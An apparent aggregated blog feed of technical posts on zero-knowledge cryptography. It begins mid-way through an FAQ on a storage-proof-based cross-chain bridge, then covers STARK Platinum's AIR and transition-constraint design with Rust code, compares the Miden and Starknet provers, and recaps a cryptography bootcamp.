Locking the user’s capital first provides guarantees to the market maker that they will receive the funds in exchange for fulfilling the user’s intent.</p>
Couldn’t you solve this problem without Storage Proofs? What do they add to the table?</strong></p>
Yes, Storage Proofs are not 100% necessary to solve this problem. But they are a key technological component for a future proof architecture. If we want this protocol to scale, storage proofs are the best way to do this. It will allow us to prove many orders together.</p>
What are the benefits against an Optimistic Oracle?</strong></p>
Optimistic Oracles were a great solution before Storage Proofs were a feasible solution, their main disadvantages are:</p>
    * Optimistic Oracles relay in Game Theory to work and it's difficult to bootstrap an ecosystem to make them robust.</span></span>
    * Codebases are complex</span></span>
    * The settlement period takes a few hours (depending on the solution) and end up creating inefficiencies for the market makers.</span></span></code></pre>
On the other hand our protocol with the native messaging and storage proofs takes no longer than 15 minutes (between Ethereum and L2) to unlock the funds. The protocol codebase is no more than 500 lines of code and the risks are easy to understand by all the players and therefore easy to come up with ways to mitigate them.</p>
Did anybody do something similar beforehand?</strong>

Hop Protocol was one of the first bridges to allow cross-chain swaps between rollups and Ethereum with an AMM-based design using multiple messaging systems (native and optimistic). The main issue lies in the capital inefficiency of an AMM model and the significant security risks of locking large amounts of capital in complex cross-chain communications.</p>
Across was the first bridge to leverage intents for a faster bridge experience and lower capital costs per transaction. However, by using an Optimistic Oracle, it naturally has a challenging period that the market has to wait to get its funds back. To optimize some of the problems their settlement mechanism introduces, they offer financial products around their main bridge solution, such as Liquidity Pools that front the capital to the market makers.</p>
What are our advantages?</strong>

Our bet is that zero-knowledge proofs will continue to improve, becoming faster and safer, thus enhancing our solution and allowing us to offer better prices by lowering risks and shortening the repayment period.</p>
    * Fast and cheap bridging experience for the user</span></span>
    * Short capital lock-up period for the market maker</span></span>
    * Low on-chain complexity. The smart contracts in total are not larger than 300 lines of code.</span></span></code></pre>Next steps</h2>
    * Speeding up message passing with EigenLayer to allow cross-chain swap settlements between L2s. The protocol should have the option to send faster messages between rollups and Ethereum with similar trust assumptions of the native messaging system.</span></span>
    * Introducing Partially Filled Orders, offering cheaper but slower transfers with batching.</span></span>
    * Intent-based DeFi Pooling.</span></span>
    * Unified wallet abstraction across multiple L2s.</span></span></code></pre>


Deep dive into Cairo's AIR and the changes we had to do in Lambdaworks to be compatible with Starknet Stone Prover
Unknown — Thu, 25 Jan 2024 00:00:00 +0000
Introduction</h2>
During the last months, we have been working to make Lambdaworks</a> STARK Platinum prover with Starknet’s Stone prover. We also want STARK Platinum to be flexible enough to be used as a drop-in replacement for other STARK provers, such as Winterfell (employed as the default prover in Miden). One of the main difficulties is related to how we provide the algebraic intermediate representation (AIR) and constraints in a simple yet expressible way and be able to try and test several trace configuration layouts. In a previous post</a>, we discussed different design choices for STARK provers, such as using virtual columns, built-ins, and chiplets and their tradeoffs. We would like the prover to be as modular as possible so that we can try different design options, incorporate new tools or fields, and assess performance. One inconvenience with previous approaches was that changes in the AIR or selecting a new layout needed extensive rewriting. Moreover, when using virtual columns, the prover must supply the zerofiers for each constraint, which depends on how the columns are interleaved, making it difficult and error-prone.</p>
In this post, we will cover the new way of implementing transition constraints and AIRs in STARK Platinum, which should give us more freedom to test and move things around, making it more straightforward to add new layouts. We also provide tools to evaluate the zerofiers without the user giving the exact expression. If you are unfamiliar with some of the concepts, you can take a look at our posts on STARKs 1</a> and 2</a>.</p>
Transition constraints</h2>
We define the public trait pub trait TransitionConstraint<F, E>: Send + Sync where F: IsSubFieldOf<E> + IsFFTField + Send + Sync, E: IsField + Send + Sync,</code>, which contains all the methods we need to deal with transition constraints. It is generic over two fields, F</code>, the base field, and E</code>, which could be a field extension of F</code>. If we do not need an extension field, we will simply have E</code> equal to F</code>. The base field should also be an FFT-friendly field, that is, it should contain a multiplicative subgroup of size $2^m$ (for example, $p = 2^{64} - 2^{32} +1$ has a multiplicative group of size $2^{64} - 2^{32}$, which is divisible by $2^{32}$). Below, we list the main methods:</p>
    * `fn degree` gives the degree of the transition constraint. All the constraints for the Cairo vm are at most degree 3. The higher the degree of the constraint, the larger the evaluation domain needed to calculate the transition constraints.</span></span>
    * `fn constraint_idx` gives the constraint identifier, a unique integer between 0 and the total number of transition constraints.</span></span>
    * `fn evaluate` provides how to evaluate the constraint over the trace's low-degree extension (LDE). Depending on the constraint, `periodic_values` or `rap_challenges` may be needed. The values are stored in the `transition_evaluations` vector, in the position corresponding to the`constraint_idx`.</span></span>
    * `fn period` indicates how often a constraint is applied. If the constraint is applied at each step, it is set to $1$. Some constraints may apply every several steps (for example, 16 or 256), which is necessary to evaluate the zerofier correctly.</span></span>
    * `fn offset` indicates where we start applying the constraint, beginning from the first step. If the constraint applies from the first step, we set it to $0$. If a constraint starts at $1$ and has a period of $16$, this means that the constraint is valid for steps 1, 17, 33, 49, etc. We need this to evaluate the zerofier correctly.</span></span>
    * `fn end_exemptions` indicates whether the constraint applies to the trace's last $n$ steps. If it applies to every step, it is set to $0$. If the last two steps do not enforce the constraint, we put it to $2$.</span></span>
    * `fn exemptions_period` and `fn periodic_exemptions_offset` are necessary to remove several intermediate steps from a constraint. All the exemptions are needed to evaluate the zerofier correctly.</span></span>
    * Several methods to evaluate the zerofier for the constraint `fn end_exemptions_poly`, `fn zerofier_evaluations_on_extended_domain` and `fn evaluate_zerofier`. The second function is needed to evaluate the composition polynomial, while the third one is required to evaluate at the out-of-domain point, $z$.</span></span></code></pre>Understanding exemptions and zerofiers</h2>
Fibonacci sequence</h3>
To fix how exemptions work, let us look at some examples. The easiest to grasp is end_exemptions</code>. These appear, for example, in the case of the calculation of the Fibonacci sequence:

$a_0 = a_1 = 1$

$a_{n + 2} = a_{n + 1} + a_n$

A single trace column can represent this and can be expressed by the following polynomial relationship:

$t(g^2 x) - t(g x) - t(x) = 0$

This constraint is valid for all computation steps except the last two. Remember that we represent each step by a power of $g$, an $n$-th primitive root of unity ($n$ is equal to the trace length). Thus, the zerofier would look like

$$Z_C (x) = \prod_{i = 0}^{ n - 3} (x - g^i ) = \frac{\prod_{i = 0}^{ n - 1} (x - g^i )}{(x - g^{n - 2} )( x - g^{n - 1} )}$$

The zerofier is

$Z (x) = \prod_{i = 0}^{ n - 1} (x - g^i ) = x^n - 1$

while the exemptions are just

$E (x) = (x - g^{n - 2} )( x - g^{n - 1} )$

The combination of both gives the zerofier for the constraint. To represent these constraints, we will have fn end_exemptions</code> return $2$, fn period</code> return $1$, and fn offset</code> yield $0$.</p>
Cairo Flags example</h3>
This example follows the constraints in the virtual column containing all the flags in the Cairo vm. The AIR is provided here</a>. The column consists of repetitions of 15 binary values, followed by a zero value. There are two transition constraints:

$t (1 - t) = 0$

$t = 0$</p>
The first constraint holds for all values except every 16th value. On the other hand, the second constraint holds only every 16 rows, starting from row 15. Let’s compute the zerofier for the second constraint first:

$Z_C (x) = (x - g^{15} )(x - g^{31} )(x - g^{47} )…$

The number of terms is $n/16$. We can take the $g^{15}$ as common factor and call $y = x/g^{15}$. Thus,

$Z_C (x) = g^{15 n/16} \prod_{j = 0}^{ n/16 - 1} (y - g^{ 16j} )$

Remember that, if $g$ is an $n$-th root of unity, $g^{16}$ is an $n/16$-th root of unity. Since we are multiplying all the $n/16$ roots of unity, we get

$Z_C (y) = g^{15 n/16} (y^{n/16} - 1)$

Distributing and remembering the relationship between $x$ and $y$

$Z_C (x) = x^{n/16} - g^{ 15n/16 }$

This zerofier is compatible with fn offset</code> equal to $15$ and fn period</code> equal to $16$, with no exemptions present.</p>
The zerofier for the first constraint can be calculated by knowing the zerofiers for the whole trace and the zerofier for the zero flag constraint. This is,

$$Z_F (x) = \frac{x^n - 1}{x^{n/16} - g^{ 15n/16 }}$$</p>
The first constraint has fn periodic_exemptions_offset</code> equal to $15$ and fn exemptions_period</code> equal to $16$, essentially computing the same zerofier as the zero flag and taking it from the full trace zerofier.</p>
Algebraic Intermediate Representation</h2>
We established an AIR trait, which contains all the methods we need to represent the trace, the constraints, and their evaluation.</p>
The method fn trace_layout(&self) -> (usize, usize)</code> provides the number of columns of the main and auxiliary traces (if it exists). The main trace contains elements in the base field (for example, Stark252 or Mini-Goldilocks). In contrast, if needed, the auxiliary trace may have elements from an extension field to achieve cryptographic security.</p>
To evaluate transition constraints, we have the methods fn compute_transition_prover</code>, fn compute_transition_verifier</code>, fn transition_constraints</code> and fn transition_zerofier_evaluations</code>.</p>
The fn transition_zerofier_evaluations</code> has a default implementation. Given that some constraints might share the same zerofier (because they apply at the same steps of the execution trace), we avoid recomputing zerofiers by checking with a zerofier_group_key</code>.</p>
fn transition_zerofier_evaluations(</span></span>
        &self,</span></span>
        domain: &Domain<Self::Field>,</span></span>
    ) -> Vec<Vec<FieldElement<Self::Field>>> {</span></span>
        let mut evals = vec![Vec::new(); self.num_transition_constraints()];</span></span>
</span>
        let mut zerofier_groups: HashMap<ZerofierGroupKey, Vec<FieldElement<Self::Field>>> =</span></span>
            HashMap::new();</span></span>
</span>
        self.transition_constraints().iter().for_each(|c| {</span></span>
            let period = c.period();</span></span>
            let offset = c.offset();</span></span>
            let exemptions_period = c.exemptions_period();</span></span>
            let periodic_exemptions_offset = c.periodic_exemptions_offset();</span></span>
            let end_exemptions = c.end_exemptions();</span></span>
</span>
            // This hashmap is used to avoid recomputing with an fft the same zerofier evaluation</span></span>
            // If there are multiple domains and subdomains they can be further optimized</span></span>
            // as to share computation between them</span></span>
</span>
            let zerofier_group_key = (</span></span>
                period,</span></span>
                offset,</span></span>
                exemptions_period,</span></span>
                periodic_exemptions_offset,</span></span>
                end_exemptions,</span></span>
            );</span></span>
            zerofier_groups</span></span>
                .entry(zerofier_group_key)</span></span>
                .or_insert_with(|| c.zerofier_evaluations_on_extended_domain(domain));</span></span>
</span>
            let zerofier_evaluations = zerofier_groups.get(&zerofier_group_key).unwrap();</span></span>
            evals[c.constraint_idx()] = zerofier_evaluations.clone();</span></span>
        });</span></span>
</span>
        evals</span></span>
    }</span></span></code></pre>Implementing the CairoAIR</h2>
The implementation of the CairoAIR starts here</a>. We begin by defining the fn new</code>, which contains the 64 constraints, the transition exemptions and the AIRContext. Since the Stone Prover uses virtual columns, the final number of constraints (counting transition and boundary constraints) will be 46. The main trace has six columns, and the auxiliary trace has 2. The plain layout for one step can be found in the documentation of our prover</a>.</p>
The implementation of the TransitionConstraint</code> trait for each of the constraints is done here</a>. This is the list of transition constraints for the CairoAIR using the plain layout:</p>
    * BitPrefixFlag0</span></span>
    * BitPrefixFlag1</span></span>
    * BitPrefixFlag2</span></span>
    * BitPrefixFlag3</span></span>
    * BitPrefixFlag4</span></span>
    * BitPrefixFlag5</span></span>
    * BitPrefixFlag6</span></span>
    * BitPrefixFlag7</span></span>
    * BitPrefixFlag8</span></span>
    * BitPrefixFlag9</span></span>
    * BitPrefixFlag10</span></span>
    * BitPrefixFlag11</span></span>
    * BitPrefixFlag12</span></span>
    * BitPrefixFlag13</span></span>
    * BitPrefixFlag14</span></span>
    * ZeroFlagConstraint</span></span>
    * InstructionUnpacking</span></span>
    * CpuOperandsMemDstAddr</span></span>
    * CpuOperandsMem0Addr</span></span>
    * CpuOperandsMem1Addr</span></span>
    * CpuUpdateRegistersApUpdate</span></span>
    * CpuUpdateRegistersFpUpdate</span></span>
    * CpuUpdateRegistersPcCondPositive</span></span>
    * CpuUpdateRegistersPcCondNegative</span></span>
    * CpuUpdateRegistersUpdatePcTmp0</span></span>
    * CpuUpdateRegistersUpdatePcTmp1</span></span>
    * CpuOperandsOpsMul</span></span>
    * CpuOperandsRes</span></span>
    * CpuOpcodesCallPushFp</span></span>
    * CpuOpcodesCallPushPc</span></span>
    * CpuOpcodesAssertEq</span></span>
    * MemoryDiffIsBit0</span></span>
    * MemoryDiffIsBit1</span></span>
    * MemoryDiffIsBit2</span></span>
    * MemoryDiffIsBit3</span></span>
    * MemoryDiffIsBit4</span></span>
    * MemoryIsFunc0</span></span>
    * MemoryIsFunc1</span></span>
    * MemoryIsFunc2</span></span>
    * MemoryIsFunc3</span></span>
    * MemoryIsFunc4</span></span>
    * MemoryMultiColumnPermStep0_0</span></span>
    * MemoryMultiColumnPermStep0_1</span></span>
    * MemoryMultiColumnPermStep0_2</span></span>
    * MemoryMultiColumnPermStep0_3</span></span>
    * MemoryMultiColumnPermStep0_4</span></span>
    * Rc16DiffIsBit0</span></span>
    * Rc16DiffIsBit1</span></span>
    * Rc16DiffIsBit2</span></span>
    * Rc16DiffIsBit3</span></span>
    * Rc16PermStep0_0</span></span>
    * Rc16PermStep0_1</span></span>
    * Rc16PermStep0_2</span></span>
    * Rc16PermStep0_3</span></span>
    * FlagOp1BaseOp0BitConstraint</span></span>
    * FlagResOp1BitConstraint</span></span>
    * FlagPcUpdateRegularBit</span></span>
    * FlagFpUpdateRegularBit</span></span>
    * CpuOpcodesCallOff0</span></span>
    * CpuOpcodesCallOff1</span></span>
    * CpuOpcodesCallFlags</span></span>
    * CpuOpcodesRetOff0</span></span>
    * CpuOpcodesRetOff2</span></span>
    * CpuOpcodesRetFlags</span></span></code></pre>
We will take a look at the implementation for BitPrefixFlag0</code> constraint, which we reproduce below:</p>
impl TransitionConstraint<Stark252PrimeField, Stark252PrimeField> for BitPrefixFlag0 {</span></span>
    fn degree(&self) -> usize {</span></span>
        2</span></span>
    }</span></span>
</span>
    fn constraint_idx(&self) -> usize {</span></span>
        0</span></span>
    }</span></span>
</span>
    fn evaluate(</span></span>
        &self,</span></span>
        frame: &stark_platinum_prover::frame::Frame<Stark252PrimeField, Stark252PrimeField>,</span></span>
        transition_evaluations: &mut [Felt252],</span></span>
        _periodic_values: &[Felt252],</span></span>
        _rap_challenges: &[Felt252],</span></span>
    ) {</span></span>
        let current_step = frame.get_evaluation_step(0);</span></span>
</span>
        let constraint_idx = self.constraint_idx();</span></span>
</span>
        let current_flag = current_step.get_main_evaluation_element(0, constraint_idx);</span></span>
        let next_flag = current_step.get_main_evaluation_element(0, constraint_idx + 1);</span></span>
</span>
        let one = Felt252::one();</span></span>
        let two = Felt252::from(2);</span></span>
</span>
        let bit = current_flag - two * next_flag;</span></span>
</span>
        let res = bit * (bit - one);</span></span>
</span>
        transition_evaluations[constraint_idx] = res;</span></span>
    }</span></span>
</span>
    fn end_exemptions(&self) -> usize {</span></span>
        0</span></span>
    }</span></span>
}</span></span></code></pre>
This constraint shows that the variable corresponding to Flag0 is binary, that is, $b \in {0 , 1}$. Mathematically, this condition is expressed as $b (1 - b) = 0$.</p>
First, we define the degree of the constraint. Since the polynomial defining the constraint $b (1 - b) = 0$ is quadratic, the degree function will return $2$. Next, we define the constraint index or identifier, which has to be between 0 and 63. We choose 0 for this constraint (but we could change it if we want the constraints to be in another order, which is convenient if we have to rearrange the constraints for compatibility). In this case, since the variable has to be binary at every execution step, the end_exemptions</code> is simply 0.</p>
We can now jump to the evaluate</code> function for the constraint. To evaluate the constraint, we need the frame</code> (containing the elements from the LDE of the main and auxiliary traces) and transition_evaluations</code>, which we will modify to add the value corresponding to the constraint. Line 17 gets the evaluation frame for the current step, and with the constraint index, we search for the current and next flags (this is an optimization used in the Stone Prover). We get the bit for the flag in line 27 and compute the constraint expression in line 29 (this should be zero if we evaluate it using the values of a valid trace). Finally, we store the value in transition_evaluations</code> at position constraint_idx</code>.</p>
Conclusion</h2>
In this post, we covered the changes introduced in STARK Platinum to deal with transition constraints and AIR definition. This will help us play more easily with different layouts and avoid having the user define the zerofiers by providing explicit expressions. We covered how zerofiers are defined and how constraint evaluations are carried out. We also think the changes will help test other features, such as using smaller fields in Starknet (though this may need further changes).</p>


Comparing STARK provers: Miden and Starknet
Unknown — Fri, 12 Jan 2024 00:00:00 +0000
Introduction</h2>
STARKs (scalable transparent arguments of knowledge) have gained widespread attention due to their ability to help scale Ethereum. They allow one party, the prover, to show to a verifier that a given program execution is correct by submitting proof that can be verified much faster than naïve re-execution by the verifier. The proof size is also smaller, of order $\mathcal{O} (\log^2 (n))$, where $n$ is the number of steps in the computation. Starknet and Polygon Miden use STARKs in their protocols to generate these proofs, using their customized versions. Starknet uses the Stone Prover</a>, while Miden uses Winterfell</a>. Our prover, STARK Platinum</a> in lambdaworks, is a general prover that we want to use as a drop-in replacement for any of these provers. If you want to understand how STARKs work, you can see our previous posts on STARKs</a>, the Stone prover</a> and FRI</a>.</p>
General steps</h2>
In a nutshell, STARKs represent a computation using an execution trace (a large table containing the values of the registers during the computation), and an algebraic intermediate representation (AIR), which is a set of polynomial constraints that should be enforced over the trace. STARKs have been improved by leveraging a preprocessing stage and getting randomness from the verifier, turning the AIR into a randomized AIR with preprocessing. This way, we can extend the trace with additional variables that will be useful for memory checks or communicating with a coprocessor. The main steps are:</p>
    1. Interpolate the trace columns to get the trace polynomials.</span></span>
    2. Commit to the trace polynomials by evaluating over a larger domain (low-degree extension) and using these evaluations as leaves in a Merkle tree.</span></span>
    3. Optional: sample randomness from the verifier and extend the trace to the auxiliary trace. Interpolate the auxiliary trace columns and commit to these polynomials following the strategy in step 2.</span></span>
    4. Sample randomness from the verifier and compute the composition polynomial using the AIR constraints and the whole trace. Commit to the composition polynomial.</span></span>
    5. Get out-of-domain point $z$ from the verifier, evaluate the trace polynomials and composition polynomial at $z$, and send them to the verifier.</span></span>
    6. Build the DEEP composition polynomial, which will let us check that the evaluations of the polynomials in point 5 are correct.</span></span>
    7. Apply the FRI protocol to the DEEP composition polynomial and get the proof.</span></span></code></pre>Checking constraints</h2>
The way we check that the constraints are enforced is as follows: let’s denote the rows of the trace as $x_0, x_1, … x_N$. An element of the trace is simply $x_{ij}$, which is a field element. An AIR constraint is some multivariate polynomial $P(u, v, w)$ where $u$, $v$, and $w$ can be elements from different rows or columns. Each of these constraints also has a validity range. Here there are some examples of constraints:</p>
    * Simple boundary constraints: these enforce that a given position in the trace $x_{ij}$ has a prescribed value. For example, we want register $2$ in row $0$ to be equal to 5. The constraint polynomial will be $P (x) = x_2 - 5$. If the trace is valid, when we plug $x_0$ into $P$, we will have $x_{02} - 5 = 0$. If we use some other row, then the polynomial would not necessarily evaluate to $0$.</span></span>
    * Consistency constraints: these enforce that the values of some register satisfy a given condition. For example, if we want register $4$ to be a boolean variable, we need that $x_{k4} (1 - x_{k4} ) = 0$ for all $k$. The constraint polynomial is therefore $P (x) = x_{4} (1 - x_4 )$ and this should hold for all rows.</span></span>
    * Simple transition constraints: show that the value for a register in a row is compatible with the values in the previous row, as dictated by the computation. For example, if we have a sequence $x_{0, n + 1} = x_{0,n}^2 + x_{1 n}$, the constraint polynomial is $P(x_{k + 1}, x_k ) = x_{0,k + 1} - x_{0,k}^2 - x_{1,k}$. The constraints hold for all the computation, except in the last row.</span></span>
    * More complex constraints: these can involve more rows, or be applied only at specific points, which makes their description a bit more complicated.</span></span></code></pre>
To enforce the constraints, we need to compose the trace polynomials (obtained by interpreting the trace as evaluations of polynomials over some set $D$) with the constraint polynomials, obtaining as many $C_i (x)$ as constraints we have, and dividing each $C_i (x)$ by their corresponding zerofier, $Z_i (x)$, which is a polynomial that is $0$ where the constraint is enforced. Some zerofiers are:</p>
    * Simple boundary constraint: $Z(x) = x - g^k$, where $g$ spans the domain $D$ ($D = { g^0, g , g^2 ... g^{n - 1}} )$.</span></span>
    * Consistency constraints: $Z(x) = x^n - 1$.</span></span>
    * Simple transition constraint: $Z(x) = (x^n - 1)/(x - g^{n - 1})$</span></span></code></pre>
The efficiency of the STARK prover depends partly on being able to compute these zerofiers in a fast way. If a constraint were to apply in steps $1, 3, 4, 6, 7, 9, 12, 14, … n-1$ with no clear pattern, we would have to spend almost linear time trying to evaluate the polynomial. If one wanted to have the simplest prover, it would be best to work with constraints involving at most two consecutive rows and being either boundary, consistency, or simple transition constraints. This helps us reduce the number of zerofiers we need to calculate and the number of multiplications.</p>
The AIR we use and how we organize the trace is important in terms of performance and usability. High-degree constraints in the AIR are going to make the evaluation of the composition polynomial more expensive. On the other hand, having a rigid organization of the trace (trace layout) adds overhead to the proving of general programs and makes it difficult to make changes to the prover. Miden has been developing AIRScript</a>, which is designed to make AIR description and evaluation simple and performant. In Lambdaworks, we are also working to make the definition of AIRs and the evaluation of constraints simpler, leading to faster provers and easier maintenance or updates.</p>
Different Algebraic Intermediate Representations</h2>
The AIR for the Miden vm is contained here</a>. The Stone prover’s AIR is dependent on the type of layout; the generalities of the AIR are here</a>. This is a list of the different layouts in Starknet:</p>
    * Plain</span></span>
    * Small</span></span>
    * Dex</span></span>
    * Recursive</span></span>
    * Starknet</span></span>
    * StarknetWithKeccak</span></span>
    * RecursiveLargeOutput</span></span>
    * AllCairo</span></span>
    * AllSolidity</span></span>
    * Dynamic</span></span></code></pre>
Here we show the diagram of a single step of the main trace for the plain layout in Starknet, without the auxiliary trace (for more information, see our analysis</a>):

</p>
The Stone Prover packs several registers in a single column, creating virtual columns. For example, all 16 flags are grouped under one column. The memory’s addresses and values are also grouped in an interleaved way in another column. This reduces the amount of columns in the trace (we merge $16$ columns in $1$), but the trace length becomes $16$ times larger. When we want to find the trace polynomials, we perform one Fast Fourier Transform (FFT) of size $16n$, instead of $16$ FFT of size $n$.</p>
Using virtual columns can be useful if some of the registers are updated only a few times, since we will still have to pad them to full length, reducing memory use in the trace. However, this comes with a big disadvantage: we have to keep different zerofiers and the evaluation frames (which we use to compute constraints efficiently) become more complex. Let’s see the difference between both approaches:</p>
16 columns</h3>
To evaluate each of the constraints, we need to take just the elements of one row. The trace has length $n$, so the zerofier is $Z (x) = x^n - 1$. 15 flags have the constraint $x (1 - x) = 0$, while the last one has $x = 0$.</p>
Single virtual column</h3>
To evaluate each constraint, we need to take just one element from the row. The problem is that the constraint $x (1 - x)$ is valid for all rows, except every $16$-th row, while constraint $x = 0$ is valid only for every $16$ rows. This way, we have to maintain two zerofiers, one for each constraint:</p>
    * $Z (x) = (x^{16n} - 1) / (x^n - g^{15n/16})$</span></span>
    * $Z (x) = x^n - g^{15n/16}$</span></span></code></pre>
The other problem is that, if a constraint involves several flags, we need to pass several rows to be able to evaluate it. It is worth noting that $g$ in this case is different from the previous case, as the interpolation now takes place over a domain of size $16n$.</p>
Built-ins and chiplets</h2>
Having a general-purpose CPU for proving comes with a cost: the virtual machine is not optimized for some commonly used operations. To deal with this, the Cairo vm (Starknet) and Miden vm introduce coprocessors to deal with these operations and then communicate the results to the CPU.</p>
Chiplets and the Miden vm</h3>
Miden uses dedicated components to accelerate complex computations, called chiplets</a>. Each chiplet handles a unique computation and is responsible for proving the correctness of the computation and its internal consistency. Currently supported chiplets are:</p>
    * Hash</span></span>
    * Bitwise</span></span>
    * Memory</span></span>
    * Kernel ROM</span></span>
    * Range checker (it works as a chiplet, but it is handled separately)</span></span></code></pre>
The chiplets execution trace is built by stacking the execution traces of each of the chiplets. This is an optimization since each chiplet is likely to generate fewer cells than other components of the vm, avoiding significant padding to take them to the same length and reducing the number of columns. It uses a similar reasoning to virtual columns in Stone, but it does not interleave them.</p>
Chiplets are identified by selectors. The total degree of the constraints is between $5$ and $9$ and each chiplet takes between 6 and 17 columns. The selectors are:</p>
    * $1$: hash</span></span>
    * $1,0$: bitwise</span></span>
    * $1,1,0$: Memory</span></span>
    * $1,1,1,0$: Kernel ROM</span></span>
    * $1,1,1,1$: padding</span></span></code></pre>
Stacking the traces of the chiplets has some difficulties, though, since the consistency and transition constraints in the last row of one chiplet may conflict with the first row of the next chiplet. This is the case of the memory and kernel ROM chiplets, where selector flags solve the conflicts.</p>
The chiplets are connected to the rest of the VM using a bus, which can send requests to any of the chiplets and receive a response. It is implemented as a running product column and, if the requests and responses match, the bus will begin and end with $1$.</p>
One of the main drawbacks of this approach is that the constraints have a rather large degree, which makes constraint evaluation more expensive. On the other hand, the construction does not require handling several zerofiers and looks simpler to implement and understand.</p>
Built-ins and Cairo vm</h3>
Built-ins are application-specific AIRs that can reduce the size of the execution trace of a given computation. For example, expressing the Poseidon hash function using Cairo needs 35k cells in the trace, while the Poseidon built-in reduces this to roughly 600-650 cells. Among the built-ins, we have:</p>
    * Poseidon</span></span>
    * Pedersen</span></span>
    * Elliptic curve operation</span></span>
    * Keccak</span></span>
    * Bitwise</span></span>
    * ECDSA</span></span>
    * Range check</span></span></code></pre>
The integration of the built-ins needs some care, though, as naïve ways may result in wasting cells, reducing the efficiency of the construction. Layouts specify the amount of cells and positions that are allocated to each component. Depending on the type of program we want to prove, we can select from the different layouts offered in Starknet to achieve the most cost-effective solution. However, it may be the case that the existing layouts provide significant overhead to prove our program, as noted in the discussion of dynamic layouts</a>. Adding new layouts needs expert knowledge and careful analysis; it may also be confusing to users, who need to understand the differences between the layouts.</p>
Each built-in has a memory segment. To check that there is no overflow from the memory segment, there are two pointers (start and stop) that are exported via the public memory mechanism. Since the constraints for each built-in apply every several rows, we are forced to compute different zerofiers and handle more complex evaluation frames.</p>
Conclusion</h2>
In this post, we discussed the characteristics of STARK provers and some implementation trade-offs. We analyzed how the Miden and Cairo VMs handle their execution traces and the description of the AIR. We also discussed the main types of constraints and the way to enforce them over the execution trace. The use of virtual columns (grouping several registers in one column) reduces the number of FFTs we have to perform, but it comes at the expense of more complex evaluation frames and keeping several zerofiers. However, this strategy is necessary when several components have fewer trace cells and padding is necessary. Miden uses this type of strategy when dealing with chiplets, but it chooses to stack the traces instead of interleaving them. This introduces several selector variables, which increase the degree of the constraints, adding an extra cost to constraint evaluation. On the other hand, evaluation frames are simpler and we do not have to compute several zerofiers. The use of layouts could lead to a more cost-effective solution, though at the expense of a larger overhead to prove some types of programs. Besides, adding more layouts increases complexity and makes things harder to maintain. We like analyzing the different solutions and their trade-offs, as they could lead to new designs that can help us improve general-purpose provers.</p>


Sparkling Water Bootcamp on Cryptography in a nutshell
Unknown — Thu, 11 Jan 2024 00:00:00 +0000
Introduction</h2>
16 weeks ago, we started the Sparkling Water Bootcamp</a> to teach cryptography and zero-knowledge proofs to a group of engineers and students from around the world, focusing on applications and coding. We started with a team of 21 people, with backgrounds in Computer Science, Physics, Mathematics, Engineering, and Architecture, among others. Our bootcampers came from several countries: India, Turkey, USA, Nigeria, Brazil, Venezuela, Ecuador, Paraguay, Cuba, France, Serbia, and Costa Rica. Given the different backgrounds and time zones, it has been a challenging experience (since it involves coordination, logistics, and adopting the best strategies to teach concepts to people with different learning styles and objectives) but we greatly enjoyed it and it taught us many things while making new friends and acquaintances. If you want to know more or keep with the latest developments, join our telegram channel</a> or see the Lambdaworks repo</a>.</p>
The contents of the bootcamp included finite field arithmetics, elliptic curves, polynomials, SNARKs, STARKs, symmetric encryption, public key cryptography, signatures, as well as an intro to Fully Homomorphic Encryption (FHE). We also discussed new papers, including Succinct Arguments over Towers of Binary Fields</a>. We hosted several lectures, discussion sessions, workshops, and guest lectures.</p>
Guest Lectures and workshops</h2>
We had the opportunity to invite several speakers from different projects to talk about their work and discuss topics in cryptography. We were lucky to have Immanuel Segol from Ingonyama, Robert Remen from MatterLabs/ZKSync, and Alan Szepieniec from Neptune.</p>
We also had workshops taught by engineers at LambdaClass, on Rust (Pablo Deymonnaz), and Cairo Native (Iñaki Garay). You can have a look at all the talks and workshops on the YouTube channel</a>.</p>
Exercises</h2>
During the first weeks, we had some practice exercises and challenges, such as naïve implementations of RSA, elliptic curve cryptography, and Shamir secret sharing. Some of the exercises and answers are contained in the Sparkling Water Bootcamp readme</a>. We also reviewed some challenges from the Lambda/Ingo ZK CTF</a>.</p>
Coding - new features in Lambdaworks</h2>
We were able to put everything we learned into practice by adding new features and proof systems to Lambdaworks. We want to thank our bootcampers for all the hard work they have done during these weeks. Among the additions, we have:</p>
    1. Groth 16 backend, [PR-612](https://github.com/lambdaclass/lambdaworks/pull/612).</span></span>
    2. Arkworks adapter for Groth 16, [PR-701](https://github.com/lambdaclass/lambdaworks/pull/701)</span></span>
    3. Added Starknet curve, and Pedersen hash, [PR-597](https://github.com/lambdaclass/lambdaworks/pull/597)</span></span>
    4. Changing Serialization by AsBytes, [PR-747](https://github.com/lambdaclass/lambdaworks/pull/747).</span></span>
    5. Affine serialization for elliptic curve points, [PR-687](https://github.com/lambdaclass/lambdaworks/pull/687)</span></span>
    6. Pasta curves, [PR-690](https://github.com/lambdaclass/lambdaworks/pull/690), [PR-698](https://github.com/lambdaclass/lambdaworks/pull/698), and [PR-714](https://github.com/lambdaclass/lambdaworks/pull/714).</span></span>
    7. Specific backend for the 31-bit Mersenne prime, [PR-669](https://github.com/lambdaclass/lambdaworks/pull/669)</span></span>
    8. Fuzzer for the BLS12-381 elliptic curve, [PR-664](https://github.com/lambdaclass/lambdaworks/pull/664)</span></span>
    9. Subgroup checks for BLS12-381 elliptic curve using Frobenius endomorphism, [PR-649](https://github.com/lambdaclass/lambdaworks/pull/649)</span></span>
    10. New CLI command to be able to prove traces using STARK Platinum, [PR-634](https://github.com/lambdaclass/lambdaworks/pull/634)</span></span>
    11. Adding support for BabyBear field, [PR-549](https://github.com/lambdaclass/lambdaworks/pull/549), [PR-576](https://github.com/lambdaclass/lambdaworks/pull/576), [PR-629](https://github.com/lambdaclass/lambdaworks/pull/629)</span></span>
    12. Specialized backend for Mini-Goldilocks field ($2^{64} - 2^{32} + 1$), [PR-622](https://github.com/lambdaclass/lambdaworks/pull/622)</span></span>
    13. Refactor the field benchmarks, [PR-606](h%5Bttps://%5D\(https://github.com/lambdaclass/lambdaworks/pull/606\))</span></span>
    14. Bug fixes, [PR-575](https://github.com/lambdaclass/lambdaworks/pull/575)</span></span>
    15. Adding Ed448 elliptic curve, [PR-546](https://github.com/lambdaclass/lambdaworks/pull/546), [PR-557](https://github.com/lambdaclass/lambdaworks/pull/557)</span></span>
    16. Proptest for unsigned integers, [PR-526](https://github.com/lambdaclass/lambdaworks/pull/526)</span></span></code></pre>
